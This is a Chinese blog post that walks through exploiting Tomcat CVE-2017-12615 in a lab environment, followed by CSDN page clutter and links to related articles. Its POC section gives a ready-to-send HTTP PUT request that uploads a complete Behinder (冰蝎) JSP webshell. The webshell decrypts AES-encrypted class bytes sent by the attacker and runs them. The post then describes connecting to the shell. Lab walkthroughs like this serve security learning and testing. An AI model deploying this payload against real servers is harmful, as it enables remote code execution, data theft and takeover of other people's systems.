Tomcat 任意写入文件漏洞(CVE-2017-12615)

已于 2024-03-29 15:16:15 修改
阅读量215 收藏 2
点赞数 2
分类专栏: 靶场计划 文章标签: tomcat
于 2024-03-29 15:02:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xnrjyswy/article/details/137144942
版权

一、漏洞描述

Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。(本篇文章不包含加固建议)

二、影响版本

此漏洞影响Windows平台下的Apache Tomcat 7.x版本,目前已在Apache Tomcat 7.0.81中修复。

(但本次靶场环境好像是8.5.19啊...啊这)

三、POC

(payload是冰蝎自带的小作文,需要修改HOST头)

PUT /1.jsp/ HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 611

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

四、复现流程

直接访问发现为Tomcat默认界面,版本8.5.19

修改请改方式为PUT,/1.jsp/(/1.jsp是上传不成功的),上传冰蝎自带小作文,或直接复制三中的POC,201成功上传:访问1.jsp存在:

打开冰蝎连接shell:

(flag在基本环境中可以找到)

五、参考链接

Document

https://www.cnvd.org.cn/flaw/show/CNVD-2017-27472

Vulhub - Docker-Compose file for vulnerability environment

一颗小黑橙
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
cve-2017-12615_cmd.py
04-26
CVE-2017-12615的稀有检测脚本,方便使用和测试,本脚本请谨慎使用!
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
hikvision_CVE-2017-7921配置文件解密.rar
05-20
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。 具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
使用vulfocus靶场复现Tomcat 任意写入文件漏洞CVE-2017-12615
R0ot
10-15 1005
访问192.168.229.130:50997即可打开tomcat 文件上传 (CVE-2017-12615)漏洞环境。修改GET类型为PUT,之后再 最下面插入冰蝎一句话木马,点击send返回201说明成功了。运行后可以看到报错了,JDK版本为11.0,冰蝎需要在Java1.8.0下运行。复制about:preferences到火狐浏览器中打开,配置代理。Tomcat 任意写入文件漏洞CVE-2017-12615)可以看到版本已经为1.8.0了,我们再次运行冰蝎子。搜索CVE-2017-12615
Tomcat任意写入文件漏洞CVE-2017-12615
黑白的博客
11-22 9121
声明 好好学习,天天向上 漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能
Tomcat任意写入文件漏洞CVE-2017-12615
灰太的表格的博客
07-23 217
Tomcat任意写入文件漏洞 漏洞原理:在web.xm文件中Tomcat设置了写权限(readonly=false),导致我们可以向服务器写入文件
漏洞复现】Tomcat 任意写入文件漏洞CVE-2017-12615
m0_46344990的博客
11-13 1303
Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞,当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,文件中的代码被服务器执行。
图片服务器
whinsist的专栏
07-05 282
1.图片服务器源码 2.图片服务器tomcat配置(tomcat/config/web.xml)         default         org.apache.catalina.servlets.DefaultServlet                     debug             0
MyBatisPlus实现多表查询
wenxuankeji的博客
05-28 451
MyBatisPlus实现多表查询
k8s部署Tomcat
u011197085的博客
05-28 407
为了确保你可以通过或访问 Tomcat 服务,即使 Pod 只运行在。
SpringBoot源码(自动装配、内嵌Tomcat
最新发布
tmax52HZ的博客
05-31 652
本文详解SpringBoot源码。从启动run方法开始,一直到钩子函数关闭Tomcat容器结束。 涉及: 1、SpringBoot自动装配 2、SpringBoot监听器 3、SpringBoot内嵌Tomcat 4、Tomcat源码分析 5、Tomcat的init、start、stop、destroy等一系列流程 6、依赖管理等内容
Tomcat 启动闪退问题解决方法
DYFdingyifei的博客
05-31 158
Tomcat版本不匹配:某些版本的Tomcat可能与操作系统、Java版本或其他软件不兼容,导致闪退。Java环境问题:Tomcat依赖于Java环境,不正确的Java配置可能导致Tomcat闪退。日志文件错误:Tomcat的日志文件可能存在错误,导致Tomcat启动失败。总结: Tomcat闪退问题可能由多个因素引起,包括内存不足、配置错误、日志文件错误、应用程序错误、Tomcat版本不匹配、网络问题和Java环境问题等。配置错误:Tomcat的配置文件可能存在错误,导致无法启动。
Tomcat
qq_64011014的博客
05-31 437
1、Web在计算机领域中代表的是网络2、像我们之前所用的WWW,它是World Wide Web三个单词的缩写,称为:万维网。3、网络相关技术的出现都是为了让我们在网络的世界中获取资源,这些资源的存放之处,我们把它叫做网站。4、我们通过输入网站的地址(网址),就可以访问网站中提供的资源(不区分局域网或广域网)、
windows tomcat服务注册和卸载
那些乐趣的博客
05-28 213
命令执行成功后,会在注册服务列表出现这个服务,如果注册失败,要看下tomcat的环境变量是否设置正确。首页解压tomcat压缩包,然后进入tomcat bin目录,在此目录通过cmd进入窗口,执行命令:service.bat install tomcat8.5.100。执行命令:service.bat remove tomcat8.5.100。执行完成后,注册服务列表就没有该服务了。1:tomcat服务注册。2:tomcat服务卸载。
tomcat-请求url初始化
weixin_42145727的博客
05-31 149
tomca启动过程中,会在请求url和各容器之间建立映射关系
cve-2017-12615漏洞复现
06-28
cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现该漏洞,需要满足以下条件: 1. 目标服务器上运行的是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值